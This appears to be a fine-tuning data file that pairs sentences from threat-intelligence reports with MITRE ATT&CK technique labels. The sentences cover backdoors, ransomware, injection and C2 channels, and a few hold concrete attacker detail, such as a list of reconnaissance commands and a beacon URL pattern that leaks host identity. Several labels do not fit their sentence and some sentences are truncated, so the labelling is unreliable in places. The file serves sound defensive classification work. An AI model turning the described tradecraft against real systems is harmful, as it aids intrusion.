356As mentioned in our earlier technical report on Trojan.Hydraq, the back door allows the attacker to perform any of the following activities: - Adjust token privileges. Create, modify, and delete registry subkeys. Retrieve a list of logical drives. Uninstall itself by deleting the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RaS[FOUR RANDOM CHARACTERS] subkey['T1012 - Query Registry']fine_tune
357Hancitor, a loader that provides Malware as a Service, has been observed distributing malware such as FickerStealer['T1566.001 - Phishing: Spearphishing Attachment']fine_tune
358The third campaign deployed a different custom RPC backdoor to that used in the second campaign. This backdoor used code derived from the publicly available PowerShellRunner tool to execute PowerShell scripts without using powershell.exe. Prior to execution, the PowerShell scripts were stored Base64-encoded in the registry['T1059.003 - Command and Scripting Interpreter: Windows Command Shell']fine_tune
359A typical response from the C2 server is a legitimate-looking webpage containing the string “!DOCTYPE html”, which the malware checks. The malware then locates a Base64-encoded blob, which it decodes and proceeds to load as a shellcode['T1140 - Deobfuscate/Decode Files or Information']fine_tune
360One of the Cobalt 2.0 Group’s latest campaigns, an attack that leads to a Cobalt Strike beacon and to a JavaScript backdoor, was investigated and presented by the Talos research team. Morphisec has investigated different samples from the same campaign. The following analysis presents our findings, focusing on the additional sophistication patterns and attribution patterns['T1059.007 - Command and Scripting Interpreter: JavaScript']fine_tune
361The malware will collect data from the victim machine and write this information to LOCALAPPDATA%\MicroSoft Updatea\uplog.tmp. The following information is collected from the victim['T1074.001 - Data Staged: Local Data Staging']fine_tune
362Like most ransomware, Sodinokibi encrypts files and adds a random extension such as “test.jpg.1cd8t9ahd5” (Data Encrypted for Impact, ATT&CK T1486). It also drops a ransom note in folders that contain encrypted files. The name of the ransom note is the random extension added to the encrypted files. For example, if the extension is ".1cd8t9ahd5", the ransom message filename will be called "1cd8t9ahd5-HOW-TO-DECRYPT.txt['T1486 - Data Encrypted for Impact']fine_tune
363The DUBNIUM samples are distributed in various ways, one instance was using a zero-day exploit that targets Adobe Flash, in December 2015['T1203 - Exploitation for Client Execution']fine_tune
364The payload decryption routine uses a custom symmetric algorithm based on arithmetic and byte-shift instructions – a combination of SHL/SHR/SUB/ADD/XOR – with hardcoded keys['T1140 - Deobfuscate/Decode Files or Information']fine_tune
365This recent APT10 activity has included both traditional spear phishing and access to victim’s networks through service providers. For more information on infection via service providers see M-Trends 2016. APT10 spear phishes have been relatively unsophisticated, leveraging .lnk files within archives, files with double extensions (e.g. [Redacted]_Group_Meeting_Document_20170222_doc_.exe) and in some cases simply identically named decoy documents and malicious launchers within the same archive['T1204.002 - User Execution: Malicious File']fine_tune
366Malicious web shell activity as observed in the Cybereason solution. Commands executed via a modified version of the China Chopper web shell['T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1505.003 - Server Software Component: Web Shell']fine_tune
367This campaign is different from prior activity because a new dropper was observed being used by Rocke that is written in Go (Golang) instead of Python. The detection for the malware on VirusTotal (VT) is nearly non-existent. Figure 1, below, shows the detections for the most recent sample submitted to VT. It can be seen that only one engine successfully detected it as malicious['T1057 - Process Discovery']fine_tune
368On June 12, QakBot continued its evolution. The delivery method of a .ZIP file to malicious .VBS was the same, but this time QakBot also dropped a Zloader payload on its victim. Beginning around 14:24 UTC, Falcon Complete observed QakBot threat actors using a new .VBS payload['T1059.005 - Command and Scripting Interpreter: Visual Basic']fine_tune
369While the decoy in Figure 2 is displayed, the macro will search the document for the delimiter ###$$$ and write the base64 encoded text that follows this delimiter to the file %APPDATA%\Base.txt. OopsIE Trojan Analysis: The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http://<c2 domain>/chk.<hex(Environment.UserName/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. The C2 server will respond to the Trojan’s request by echoing the value <hex(Environment.UserName/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http://<c2 domain>/what.<hex(Environment.UserName/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit['T1041 - Exfiltration Over C2 Channel']fine_tune
370Attackers replaced win_fw.dll, an internal component that is executed during IDA Pro installation, with a malicious DLL. The malicious win_fw.dll creates a Windows scheduled task that starts a second malicious component, idahelper.dll, from the IDA plugins folder['T1036.004 - Masquerading: Masquerade Task or Service', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading']fine_tune
371The maldocs used in this campaign typically contain a malicious VBA macro that downloads and activates the next stage of the infection chain. Although the VBA macro contains an auto open subroutine, it uses several VBA functions registered to trigger if the "Typing replaces selection" property is enabled in Microsoft Word. Appdata%\desktop.ini The next stage of the VBS is run using wscript.exe using a command such as: %windir%\System32\wscript.exe //e:vbscript //b <path_to_Stage_2> (Macros dropping VBS to disk and running via wscript.exe)['T1140 - Deobfuscate/Decode Files or Information']fine_tune
372The injection function is responsible for resolving all the required API calls. It then opens a handle to the target process by using the OpenProcess API. It uses the SizeOfImage field in the NT header of the DLL to be injected to allocate space in the target process, along with a separate space for the init_dll function. The purpose of the init_dll function is to initialize the injected DLL and then pass the control flow to the entry point of the DLL. One thing to note here is that a simple CreateRemoteThread method is used to start a thread inside the target process, unlike the KernelCallbackTable technique used in our macro['T1104 - Multi-Stage Channels']fine_tune
373SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. SDBbot is composed of three pieces: an installer, a loader, and a RAT component['T1055.001 - Process Injection: Dynamic-link Library Injection', 'T1105 - Ingress Tool Transfer']fine_tune
374This would save them the trouble of needing to load additional malware to exfiltrate files or other material. We are aware of no evidence of follow-up interactions between the operators and successful victims as part of any extortion attempts. Furthermore, Stealth Falcon’s use of JavaScript to profile and de-anonymize victims seems inconsistent with a primary motivation of collecting information that could be used for blackmail['T1005 - Data from Local System']fine_tune
375Siloscape mimics CExecSvc.exe privileges by impersonating its main thread and then calls NtSetInformationSymbolicLink on a newly created symbolic link to break out of the container['T1134.001 - Access Token Manipulation: Token Impersonation/Theft']fine_tune
376One unique and fairly recent variant is a plain downloader that follows a similar convention to the aforementioned MarkiRAT implants. It also leverages MFC and embeds its logic within a CDialog class, getting executed upon initiation of an MFC dialog object during runtime. The use of this sample diverges from those used by the group in the past, where the payload was dropped by the malware itself, suggesting that the group might be in the process of changing some of its TTPs['T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
377The implementation details of Seaduke also have some similarities to WellMess, as both use encrypted cookies to transfer metadata about the data being sent and use obfuscated base64 data in HTTP requests as the contents of communications. These techniques are not unique to Blue Kitsune but provide an interesting correlation between the WellMess backdoor and Blue Kitsune tools used since 2015['T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
3781) The group delivers a malicious Office lure document to victims, most likely via a spear-phishing email. 2) These lure documents use titles with government, military, and diplomatic themes, and the file names are written in English or Cyrillic languages. These documents are not very sophisticated, but evidence of infections shows that they’re effective['T1566.001 - Phishing: Spearphishing Attachment']fine_tune
379In past attacks, the Ragnar Locker group has used exploits of managed service providers or attacks on Windows Remote Desktop Protocol (RDP) connections to gain a foothold on targeted networks['T1569.002 - System Services: Service Execution', 'T1543.003 - Create or Modify System Process: Windows Service']fine_tune
380- whoami /all - arp -a - ipconfig /all - net view /all - cmd /c set - - nltest /domain_trusts /all_trusts - net share - route print - netstat -nao - net localgroup - qwinsta - WMI Query ROOT\CIMV2:Win32_BIOS - WMI Query ROOT\CIMV2:Win32_DiskDrive - WMI Query ROOT\CIMV2:Win32_PhysicalMemory - WMI Query ROOT\CIMV2:Win32_Product - WMI Query ROOT\CIMV2:Win32_PnPEntity['T1047 - Windows Management Instrumentation']fine_tune
381Once gaining the initial foothold into a container, Hildegard establishes either a tmate session or an IRC channel back to the C2. It is unclear how TeamTNT chooses and tasks between these two C2 channels, as both can serve the same purpose. Unit 42 researchers have not observed any commands in the IRC channel. However, the IRC server's metadata indicates that the server was deployed on Jan['T1071 - Application Layer Protocol']fine_tune
382Grants system privileges via Windows services - Uses DLL sideloading technique to evade security solutions - Starts and injects code to a new svchost process to prevent tracking['T1543.003 - Create or Modify System Process: Windows Service', 'T1055 - Process Injection']fine_tune
383This component overwrites the master boot record (MBR) of an infected host with a malicious 16-bit bootloader with a SHA256 hash of['T1561.002 - Disk Structure Wipe']fine_tune
384Analysis of BRONZE BUTLER's operations, targeting, and capability led CTU researchers to assess that it is likely that the group is located in the PRC. The group has used spearphishing, strategic web compromises (SWCs), and an exploit of a zero-day vulnerability to compromise targeted systems. After exfiltrating targeted data from a network, BRONZE BUTLER typically deletes evidence of its activities. However, it maintains access to compromised environments when possible, periodically revisiting compromised sites to identify new opportunities for data exfiltration['T1087.002 - Account Discovery: Domain Account']fine_tune
385Also, the PlugX that Mustang Panda APT uses has some extra features, including spreading through USB, gathering information, and stealing documents in air-gapped networks via USB['T1560.003 - Archive via Custom Method', 'T1074.001 - Data Staged: Local Data Staging']fine_tune
386The following commands were used to create and add the DefaultUser account to the local Administrators group, and subsequently hide the account from the Windows logon screen['T1087.001 - Account Discovery: Local Account', 'T1098 - Account Manipulation', 'T1136.001 - Create Account: Local Account', 'T1564.002 - Hide Artifacts: Hidden Users']fine_tune
387At this point the C2 sends a JSON with commands to execute, including uploading/downloading files, taking a screenshot and finding *.rar archives on the host['T1041 - Exfiltration Over C2 Channel']fine_tune
388The captured sample used in this analysis is an MSI file named “view-(AVISO)2020.msi” that is spread through a ZIP archive, just as with the previous variant. In the previous analysis, I showed that this MSI file is parsed and executed automatically by MsiExec.exe when a user double clicks on it in Windows OS['T1218.007 - Signed Binary Proxy Execution: Msiexec']fine_tune
389After gaining an initial foothold on a compromised system, the NICKEL actors routinely performed reconnaissance on the network, working to gain access to additional accounts or higher-value systems. NICKEL typically deployed a keylogger to capture credentials from users on compromised systems['T1070 - Indicator Removal on Host', 'T1114.002 - Email Collection: Remote Email Collection']fine_tune
390In 2011, while still at McAfee, he went on to reveal Comment Crew (which he calls Comment Panda) operating alongside Elderwood. It's called that because the group so often uses a technique involving internal software "comment" features on web pages as a tool to infiltrate target computers['T1189 - Drive-by Compromise']fine_tune
391The threat actor initially conducts system reconnaissance to assess the AV software installed and the user privilege['T1518.001 - Software Discovery: Security Software Discovery']fine_tune
392We observed the threat group upload a second stage malware, known as BUBBLEWRAP (also known as Backdoor.APT.FakeWinHTTPHelper) to their Dropbox account along with the following command['T1049 - System Network Connections Discovery', 'T1069.001 - Permission Groups Discovery: Local Groups']fine_tune
393Finally, it deletes Shadow Volume Copies and prevents the victim from using Shadow Volumes to recover their encrypted files['T1047 - Windows Management Instrumentation', 'T1490 - Inhibit System Recovery']fine_tune
394Deriving C2 URLs from a Domain Generation Algorithm (DGA) using lists of domain names, subdomains, top-level domains (TLDs), Uniform Resource Identifiers (URIs), file names, and file extensions['T1568.002 - Domain Generation Algorithms']fine_tune
395These fake updates are served via legitimate websites that have been compromised, and use social engineering to trick users into downloading and running a malicious executable. These fake update campaigns appear to be a pay-per-install service that is simply used by INDRIK SPIDER to deliver its malware, as other malware has also been delivered via the same campaigns['T1105 - Ingress Tool Transfer']fine_tune
396Although the developers attempt to use a denylist of files and directories to skip, it was observed encrypting core Windows operating system files, which caused the operating system to become unstable and crash. This was observed when running the ransomware on a Windows 2012 machine['T1486 - Data Encrypted for Impact']fine_tune
397In a new sample of the REvil ransomware discovered by MalwareHunterTeam, a new -smode command-line argument was added that forces the computer to reboot into Safe Mode before encrypting a device['T1562.009 - Impair Defenses: Safe Boot Mode']fine_tune
398The BackConfig custom trojan has a flexible plug-in architecture for components offering various features, including the ability to gather system and keylog information and to upload and execute additional payloads['T1105 - Ingress Tool Transfer', 'T1082 - System Information Discovery']fine_tune
399Since then, the threat actors have expanded delivery to include malicious spam campaigns, RDP attacks, and other attack vectors. In other reports, threat actors breached at least three managed service providers (MSPs) and used the access to deploy REvil to the MSPs' customers['T1566 - Phishing']fine_tune
400The following diagram illustrates the changes applied to targeted executables after infection has taken place and how these components interact on execution['T1091 - Replication Through Removable Media']fine_tune
401Basic system enumeration – The script collects the Windows OS version, computer name, and the contents of a file Ni.txt in $APPDATA path; the file is presumably created and filled by different modules that will be downloaded by the main module['T1082 - System Information Discovery']fine_tune
402Starting with a simple scan, the first information that the malware can collect is related to files with the following extensions: .docx, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .bmp, .tiff. For each file found on the disk, it retrieves the full path and the last modified date of the file. That information is encrypted using the AES key mentioned earlier and stored in the file 0.txt. Another scan targets the extensions .dat, .json, .db and like the previous scan it retrieves the full path and last modified date of the file. Then it encrypts them and stores them under the file 57.txt['T1119 - Automated Collection']fine_tune
403Reports system hardware and software configuration. This built-in utility is a command line version of the System Information.app (/Applications/Utilities/System Information.app) and is a mainstay of all types of malware, spyware, post-exploitation tools, adware, and PUPs. Because of its deep insight into the entire environment, it can be used for a variety of purposes relating to environment discovery, detection evasion and anti-analysis['T1082 - System Information Discovery']fine_tune
404As seen in the above screenshot, there is a large overlap in unique strings in both samples. The original sample involved in the forbes.com breach used HTTP, which is consistent with the original variant discussed in this blog post. It should be noted that while the newest variant that uses direct network communication over port 22 no longer uses HTTP, references to the HTTP strings are still found within the sample itself. This is most likely due to code reused by the attackers['T1140 - Deobfuscate/Decode Files or Information']fine_tune
405In late July 2021, we identified an ongoing spear phishing campaign pushing Konni Rat to target Russia. Konni was first observed in the wild in 2014 and has been potentially linked to the North Korean APT group named APT37['T1566.001 - Phishing: Spearphishing Attachment']fine_tune
406The orchestrator is the main component of the Carbon framework. It is mainly used to inject code into a process that communicates legitimately over the Internet and to dispatch the tasks received from the injected library to other computers on the same network either through named pipes or TCP['T1055.001 - Process Injection: Dynamic-link Library Injection']fine_tune
407The HTTP variant checks if Kaspersky is installed on the victim’s machine by searching for the existence of files in the Kaspersky installation folder['T1518.001 - Software Discovery: Security Software Discovery']fine_tune
408The Zebrocy Trojan gathers system specific information that it will send to the C2 server via an HTTP POST request to the above URL. Like other Zebrocy samples, this Trojan collects system specific information it will send to the C2 server by running the command SYSTEMINFO & TASKLIST on the command line and by enumerating information about connected storage devices. This specific variant of Zebrocy will also send a screenshot of the victim host as a JPEG image to the C2 server['T1113 - Screen Capture', 'T1057 - Process Discovery', 'T1120 - Peripheral Device Discovery', 'T1082 - System Information Discovery']fine_tune
409PowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage['T1218.005 - Signed Binary Proxy Execution: Mshta']fine_tune
410We observed a number of phishing emails that reference an invoice, as seen in Figure 1. The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that – when enabled – leads to the download of Hancitor['T1566.001 - Phishing: Spearphishing Attachment']fine_tune
411These are later used by the attackers to send targeted emails to the victims, with the obtained information being used to lure victims into opening those emails['T1135 - Network Share Discovery']fine_tune
412The trojanized update file is a standard Windows Installer Patch file that includes compressed resources associated with the update, including the trojanized SolarWinds.Orion.Core.BusinessLayer.dll component['T1036.005 - Masquerading: Match Legitimate Name or Location']fine_tune
413Cisco Talos has observed another malware campaign that utilizes malicious Microsoft Office documents (maldocs) to spread the remote access trojan (RAT) ObliqueRAT. ObliqueRAT has been linked to the Transparent Tribe APT group in the past['T1566.001 - Phishing: Spearphishing Attachment', 'T1566.002 - Phishing: Spearphishing Link']fine_tune
414Xbash is a novel and complex Linux malware and the newest work of an active cybercrime group. From its characteristics and behaviors, we could realize many trends in current IoT/Linux security battleground['T1053.003 - Scheduled Task/Job: Cron']fine_tune
415Once we deobfuscated it, we found that the script contained a large array of hard coded domain names, with one of them being randomly selected and used for subsequent DNS queries. It is important to note that while the Powershell scripts for stages 3 and 4 contain two arrays of domains, the first array is only used if a failure condition is reached while the sample is using the second array. Figure 8: Stage 3 Domain List The 'logic' function present within this Powershell script randomly selects a C2 domain from the second array in the script and uses this domain to perform an initial lookup. If the result of the initial DNS TXT record request is empty or in the case the lookup fails, the 'do_lookup' function is then called and randomly selects a domain from the first array in the script. Interestingly, the domains used by the 'do_lookup' function did not appear to have active 'www' or 'mail' TXT records. The script also uses specific subdomains which are combined with the domains and used for the initial DNS TXT record queries performed by the malware. The malware uses the contents of the TXT record in the response to these queries to determine what action to take next. For instance, the first subdomain is 'www' and a query response with a TXT record containing 'www' will instruct the script to proceed. The response to this DNS request results in the transmission of the fourth stage malware, stored within the TXT record as displayed in Figures 10 and 11. Due to the size of the Stage 4 payload, DNS makes use of TCP for this transaction['T1071.004 - Application Layer Protocol: DNS']fine_tune
416It writes a file using two data structures: one associated with the file and other used for reading data from the C&C['T1070 - Indicator Removal on Host']fine_tune
417The only way to ensure that deleted files, as well as files that you encrypt with EFS, are safe from recovery is to use a secure delete application. Secure delete applications overwrite a deleted file's on-disk data using techniques that are shown to make disk data unrecoverable, even using recovery technology that can read patterns in magnetic media that reveal weakly deleted files. SDelete (Secure Delete) is such an application. Note that SDelete securely deletes file data, but not file names located in free disk space['T1070.004 - Indicator Removal on Host: File Deletion', 'T1485 - Data Destruction']fine_tune
418Download and execution of ntbscan (SHA-1: 90da10004c8f6fafdaa2cf18922670a745564f45) – NetBIOS scanner tool widely used by multiple APT actor including the prolific Chinese group APT10 - Execution of Windows built-in networking utility tools - Access to the victim’s files, especially documents located on the Desktop['T1083 - File and Directory Discovery']fine_tune
419Executive summary . The PROMETHIUM threat actor — active since 2012 — has been exposed multiple times over the past several years.. However, this has not deterred this actor from continuing and expanding their activities. The group has at least four new trojanized setup files we observed: Firefox (a browser), VPNpro (a VPN client), DriverPack (a pack of drivers) and 5kPlayer (a media player). How did it work. Talos could not pinpoint the initial attack vector, however, the use of trojanized installation files to well-known applications is consistent with the previously documented campaigns. The trojanized setup will install the malware and the legitimate application, which is a good way to disguise its activities. PROMETHIUM has been resilient over the years. We have no evidence that the websites of the real applications were compromised to host the malicious installer. We can conclude that the PROMETHIUM threat actor is interested in new countries or the malicious framework developed by this threat actor is exported in more countries than previously thought. The usage of the HKCU\Software\Microsoft\Windows\CurrentVersion\Run registry key has a persistence mechanism that has been replaced by the creation of a service. The malicious service: rmaserv.exe . This binary has two main features. Conclusion . The PROMETHIUM threat actor is dedicated and resilient, exposing them hasn't refrained them from moving forward with their agenda['T1036.005 - Masquerading: Match Legitimate Name or Location']fine_tune
420As part of Reflective DLL loading the malware performs the following tasks on the DLL it has unwrapped in memory: Copy the unwrapped DLL into new locations in its own memory space. Build imports required by the DLL (based on the IAT of the DLL) - Copy the unwrapped DLL into new locations in its own memory space. Build imports required by the DLL (based on the IAT of the DLL['T1055.001 - Process Injection: Dynamic-link Library Injection']fine_tune
4214) Special attention was given to the design of the network communication, in order to reduce the noise a large number of encrypted machines may generate while contacting the Command and Control servers. 5) The encryption scheme is solid – using the AES and RSA algorithms['T1573.002 - Asymmetric Cryptography', 'T1486 - Data Encrypted for Impact']fine_tune
422The tool was primarily used by the attackers to move laterally on the victim’s network. PowerShell: Microsoft scripting tool that was used to run commands to download payloads, traverse compromised networks, and carry out reconnaissance. WinSCP: Open source FTP client used to exfiltrate data from targeted organizations['T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol']fine_tune
423While investigating the domains and infrastructure used by the phishing components of Gorgon Group, Unit 42 researchers witnessed several common operational security flaws with Gorgon Group's actors throughout their many campaigns. It was one of these OPSEC failures that gave us an interesting cross-section of malware Gorgon Group is using. Included in the directories were a combination of files leveraged in targeted attacks mentioned above against nation states. Additionally, there was a plethora of malware samples that were criminal in nature['T1106 - Native API']fine_tune
424Both variants of ServHelper use the same HTTP C&C protocol on port 443 (HTTPS) and, less frequently, port 80 (HTTP). An example of the initial phone home to the C&C server is shown in Figure 5['T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
425IcedID’s operators probably plan on targeting businesses because they added a network propagation module to the malware from the get-go. IcedID possesses the ability to move to other endpoints, and X-Force researchers also observed it infecting terminal servers['T1087.003 - Email Account']fine_tune
426Reaver proceeds to write a shortcut file to ‘%TEMP%\~WUpdate.lnk’. This file is then copied to a filename of ‘Windows Update.lnk’, which is placed in the startup path previously identified. This shortcut file points to the path of the previously written ‘Applet.cpl’ file. Finally, Reaver.v1 will execute the ‘~WUpdate.lnk’ file in a new process, thus loading the recently dropped malicious CPL file. In the event this is successful, the malware will use the following path to store any dropped files['T1218.002 - Signed Binary Proxy Execution: Control Panel']fine_tune
427The attackers used the Windows Management Instrumentation Command Line Utility (wmic.exe) to execute commands on remote computers, such as adding a new user or executing additional downloaded PowerShell scripts. Cobalt Strike was also used to carry out credential dumping using ProcDump and to empty log files['T1136 - Create Account', 'T1047 - Windows Management Instrumentation', 'T1070.001 - Indicator Removal on Host: Clear Windows Event Logs', 'T1003.001 - OS Credential Dumping: LSASS Memory']fine_tune
4283, 2019): On May 16, 2019 FireEye's Advanced Practices team attributed the remaining "suspected APT33 activity" (referred to as GroupB in this blog post) to APT33, operating at the behest of the Iranian government. The actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018. At one point in late-August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed. FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. The operators behind each of the described intrusions are using publicly available but not widely understood tools and techniques in addition to proprietary implants as needed. Custom Backdoor: POWERTON . POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. FireEye has observed an increase in targeted adversaries challenging and subverting security controls on Exchange and Office365. At FireEye, our decisions are data driven, but data provided to us is often incomplete and missing pieces must be inferred based on our expertise in order for us to respond to intrusions effectively. Credential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently elsewhere on the internet['T1068 - Exploitation for Privilege Escalation']fine_tune
429The malware sets its persistence mechanism by creating a RunKey in the registry to ensure its survival after system reboot events['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']fine_tune
430Audio surveillance: The malware uses the NAudio library to interact with the microphone and manage the audio stream. The library is stored server-side and pushed to the victim’s machine using a special command. The bot will display the messages using a standard message box. The log includes the process name used by the victim, and keystrokes. The theft is performed by a specific component that enumerates credentials saved in various browsers. Process manager: The attacker can obtain a list of running processes and terminate these by using a specific button['T1123 - Audio Capture']fine_tune
431HAYMAKER is a backdoor that can download and execute additional payloads in the form of modules. It also conducts basic victim profiling activity, collecting the computer name, running process IDs, %TEMP% directory path and version of Internet Explorer. It communicates encoded system information to a single hard coded command and control (C2) server, using the system’s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. The malware’s capabilities include taking a system survey, access to the filesystem, executing commands and a reverse shell['T1059.003 - Command and Scripting Interpreter: Windows Command Shell']fine_tune
432One of the custom tools used by the Leafminer group is a rebranded version of the widespread post-exploitation tool Mimikatz['T1083 - File and Directory Discovery']fine_tune
433The default case when the service tag is empty allows the malware to treat the contents of the response from the C2 as a command to execute via the Go library functions os.exec.Command or os.exec.Start. The format of the received command is checked against the below regex pattern for validity before executing and the command is read from the body of the message received from the C2['T1059.003 - Command and Scripting Interpreter: Windows Command Shell']fine_tune
434In 2014, Imminent Monitor started supporting third-party plugins. The first of these offered the ability to turn the webcam light off while monitoring. Shockwave™ wrote: “Hey, good job on being the first to release a plugin for Imminent Monitor['T1125 - Video Capture']fine_tune
435Where the number of passed parameters is one, the payload will read the sys.bin.url file from %appdata%\systemconfig. It will then spawns a new svchost process as C:\\windows\\system32\\svchost.exe –k update in suspended state and injects the payload. Finally, it patches the entry point of svchost.exe so it can execute the malicious payload after the ResumeThread call['T1055.012 - Process Injection: Process Hollowing']fine_tune
436This module intercepts HWP documents on an infected computer. The HWP file format is similar to Microsoft Word documents, but supported by Hangul, a South Korean word processing application from the Hancom Office bundle. This malware module works independently of the others and maintains its own Bulgarian e-mail account. The account is hardcoded in the module along with the master’s e-mail to which it sends intercepted documents. It is interesting that the module does not search for all the HWP files on infected computer, but reacts only to those that are opened by the user and steals them. This behavior is very unusual for a document-stealing component and we do not see it in other malicious toolkits['T1005 - Data from Local System']fine_tune
437In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim’s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. Also, its configuration is encrypted and is not base64 encoded anymore. It also does not use FTP for exfiltration['T1041 - Exfiltration Over C2 Channel', 'T1140 - Deobfuscate/Decode Files or Information']fine_tune
438TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file “gracious_truth.jpg”, which likely has a fake JPG header. TEARDROP does not have code overlap with any previously seen malware. We believe that this was used to execute a customized Cobalt Strike BEACON['T1105 - Ingress Tool Transfer']fine_tune
439The adversary used the built-in lateral movement possibilities in Cobalt Strike. Cobalt Strike has various methods for deploying its beacons at newly compromised systems. We have seen the adversary using SMB, named pipes, PsExec, and WinRM. They continue lateral movement and discovery in an attempt to identify the data of interest['T1021.006 - Remote Services: Windows Remote Management']fine_tune
440It is used by the financially motivated GOLD SOUTHFIELD threat group, which distributes ransomware via exploit kits, scan-and-exploit techniques, RDP servers, and backdoored software installers. CTU™ researchers attribute GandCrab to the GOLD GARDEN threat group['T1190 - Exploit Public-Facing Application', 'T1133 - External Remote Services']fine_tune
441CWS or WSA web scanning prevents access to malicious websites, including watering hole attacks, and detects malware used in these attacks['T1189 - Drive-by Compromise']fine_tune
442The attackers typically distribute Netwalker ransomware with the use of a reflective PowerShell loader script that has been protected from casual analysis with several layers of obfuscation['T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1027 - Obfuscated Files or Information']fine_tune
443BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control (C2) and operational infrastructure. The threat actors also integrate infrastructure they likely previously compromised for espionage purposes. For example, CTU researchers identified the group using IP addresses owned by several, presumably compromised, research organizations to interact with web shells in other target environments['T1003.002 - OS Credential Dumping: Security Account Manager', 'T1003.004 - OS Credential Dumping: LSA Secrets']fine_tune
444As mentioned previously, this backdoor also supports loading plugins. The server creates a thread that searches for files matching the following pattern lPH*.dll. If such a file exists, it is loaded and its export function ModuleStart is called. Among the various plugins we have located so far, one is able to steal recent files and files from USB thumb drives['T1025 - Data from Removable Media', 'T1083 - File and Directory Discovery']fine_tune
445Phishing emails continued to use links to external ZIP or RAR archives, which ultimately contained an executable with the extension SCR. The attackers also made extensive use of Hostinger’s cheap web hosting services to deliver initial payloads['T1204.001 - Malicious Link']fine_tune
446After decrypting the C&C server address, the shellcode proceeds to send an HTTP GET request to fetch the resource: “msdn.cpp” on the server['T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
447The purpose of the bytecode is to decrypt the embedded payload, load it into memory reflectively and execute it['T1140 - Deobfuscate/Decode Files or Information']fine_tune
448The backdoor contain narrow capabilities: download and upload files, run commands and send the attackers the results. However short the list, they allow the attackers to upload and execute additional tools for further reconnaissance and lateral movement['T1105 - Ingress Tool Transfer']fine_tune
449Network analysis — run one of the plugins to retrieve Active Directory and network information (Fig['T1016 - System Network Configuration Discovery']fine_tune
450Before running the above command to open the decoy document, the shellcode enumerates the running processes on the system, specifically looking for processes created for an executable with a filename that starts with “avp. presumably in an attempt to find Kaspersky’s antivirus process. If the process is found, the shellcode will not open the decoy document and exits['T1057 - Process Discovery']fine_tune
451This RAT is also known for its keylogging and file transfer functionality. As such, any remote attacker can load any files onto the infected machine or even steal documents['T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1105 - Ingress Tool Transfer']fine_tune
452The malware will setup the miner and then the miner will persist it in the system in two ways: 1) by adding itself as a service if the malware gains admin privileges or 2) by adding the batch file to the startup folder['T1543.003 - Create or Modify System Process: Windows Service']fine_tune
453Registered and active during late June 2020, newspointview[.]com has been used with more recent SombRAT variants as the primary C2 domain['T1105 - Ingress Tool Transfer']fine_tune
454An example of these tasks is shown below: • write a file and execute it with CreateProcess() capturing all of the standard output • update C&C configuration, plugin storage, etc • update autoruns • write arbitrary files to the filesystem (“File Upload”) • read arbitrary files from the filesystem (“File Download”) • update itself • uninstall • push task results to C2 servers['T1105 - Ingress Tool Transfer']fine_tune
455Exploits a kernel privilege escalation vulnerability to gain SYSTEM privileges using CVE-2018-8453. Whitelists files, folders and extensions from encryption. Encrypts files on local and network storage. Customizes the name and body of the ransom note, and the contents of the background image. Exfiltrates encrypted information on the infected host to remote controllers. REvil uses Hypertext Transfer Protocol Secure (HTTPS) for communication with its controllers['T1486 - Data Encrypted for Impact']fine_tune
